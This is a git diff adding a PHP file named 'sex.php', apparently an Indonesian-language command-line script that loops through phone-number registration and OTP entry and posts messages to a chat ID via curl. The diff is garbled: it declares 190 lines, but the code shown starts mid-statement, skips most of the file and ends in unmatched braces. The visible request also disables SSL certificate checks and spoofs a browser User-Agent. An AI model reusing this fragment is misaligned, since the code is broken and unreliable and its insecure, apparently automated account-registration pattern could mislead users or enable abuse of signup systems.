diff --git a/sex.php b/sex.php new file mode 100644 index 0000000..f37a81e --- /dev/null +++ b/sex.php @@ -0,0 +1,190 @@ + $chatid, + 'text' => $pesan + ]; + $header = [ + "X-Requested-With: XMLHttpRequest", + "User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.84 Safari/537.36" + ]; + $ch = curl_init(); + curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); + curl_setopt($ch, CURLOPT_URL, $url); + curl_setopt($ch, CURLOPT_HTTPHEADER, $header); + curl_setopt($ch, CURLOPT_POSTFIELDS, $post ); + curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); + $datas = curl_exec($ch); + $error = curl_error($ch); + $status = curl_getinfo($ch, CURLINFO_HTTP_CODE); + curl_close($ch); + $debug['text'] = $pesan; + $debug['respon'] = json_decode($datas, true); + + + } + } + } + }else{ + echo color("red","-] Otp yang anda input salah"); + echo"\n==================================\n\n"; + echo color("yellow","!] Silahkan input kembali\n"); + goto otp; + } + }else{ + echo color("red","-] Nomor sudah teregistrasi"); + echo"\n==================================\n\n"; + echo color("yellow","!] Silahkan registrasi kembali\n"); + goto ulang; + } +// } + +// echo change()."\n";